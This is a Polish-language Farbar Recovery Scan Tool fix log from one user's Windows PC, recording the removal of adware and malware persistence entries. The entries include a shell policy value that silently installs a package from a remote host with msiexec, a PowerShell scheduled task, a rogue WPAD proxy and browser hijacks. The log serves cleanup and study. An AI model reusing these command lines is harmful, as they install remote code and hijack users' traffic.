Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 06-05-2017 Uruchomiony przez Kris (07-05-2017 04:32:51) Run:2 Uruchomiony z C:\Users\Kris\Downloads Załadowane profile: Kris (Dostępne profile: Kris) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: Task: {21CCB704-AB01-427E-B904-3590081354CD} - \SystemToolsDailyTest -> Brak pliku <==== UWAGA Task: {671B90D7-2821-4376-85F7-7D3B5FE6EACA} - \Milimili -> Brak pliku <==== UWAGA Task: {67E32AC8-0D22-4518-BD83-6999DE3BD7AC} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 ShortcutWithArgument: C:\Users\Kris\Desktop\Software\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKGKjdhx1sXu8CuYCS%2BMYEvNgv7FP7Xd2TZZRXRwYgKOyPaM9Tqsu%2FMvPi8wooPyk%3Dhoi Winlogon\Notify\igfxcui: HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Run: [background_fault] => C:\Users\Kris\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== UWAGA C:\Users\Kris\AppData\Local\background_fault\aswRD.exe HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjwdRkJSM8NLOThLNjJWMWH5MjFxMdw3RWLLRTEyRq== /q HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\Explorer: [] \HKU\S-1-5-18\...\RunOnce: [panda4_2dn] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_2dn" /f HKU\S-1-5-18\...\RunOnce: [panda] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f HKU\S-1-5-18\...\RunOnce: [panda_XP] => reg.exe delete "HKCU\Software\panda" /f IFEO\DisplaySwitch.exe: [Debugger] GroupPolicy-x32: Ograniczenia <======= UWAGA GroupPolicyScripts-x32: Ograniczenia <======= UWAGA AutoConfigURL: [S-1-5-21-3990190956-98265678-2498883457-1001] => hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844 ManualProxies: 0hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Zoohair RemoveDirectory: C:\Users\Kris\AppData\Local\Zoohair R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [Brak podpisu cyfrowego] R2 Kitty; C:\Users\Kris\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [Brak podpisu cyfrowego] <==== UWAGA R2 SNARE; C:\Users\Kris\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S2 MBAMChameleon; \SystemRoot\system32\drivers\MBAMChameleon.sys [X] U2 McMPFSvc; Brak ImagePath S3 OATool; \??\C:\Users\ADMINI~1\AppData\Local\Temp\OAToolx64.sys [X] <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Kris\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Kris\AppData\Local\Firefox C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk FirewallRules: [{C1AAC7C0-CFC0-476B-9704-8C4E1786E18C}] => (Allow) C:\Program Files (x86)\Zoohair\Application\chrome.exe DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Kris\AppData\Local\Mozilla C:\Users\Kris\AppData\Roaming\Mozilla C:\Users\Kris\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Kris\AppData\Local CMD: dir /a C:\Users\Kris\AppData\LocalLow CMD: dir /a C:\Users\Kris\AppData\Roaming RemoveProxy: EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{21CCB704-AB01-427E-B904-3590081354CD} => klucz nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemToolsDailyTest => klucz nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{671B90D7-2821-4376-85F7-7D3B5FE6EACA} => klucz nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{67E32AC8-0D22-4518-BD83-6999DE3BD7AC} => klucz nie znaleziono. C:\Windows\System32\Tasks\Windows-PG => nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => klucz nie znaleziono. C:\Users\Kris\Desktop\Software\Google Chrome.lnk => Skrót - argument pomyślnie usunięto. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui => klucz nie znaleziono. HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość nie znaleziono. "C:\Users\Kris\AppData\Local\background_fault\aswRD.exe" => nie znaleziono. HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość nie znaleziono. HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\ => Wartość nie znaleziono.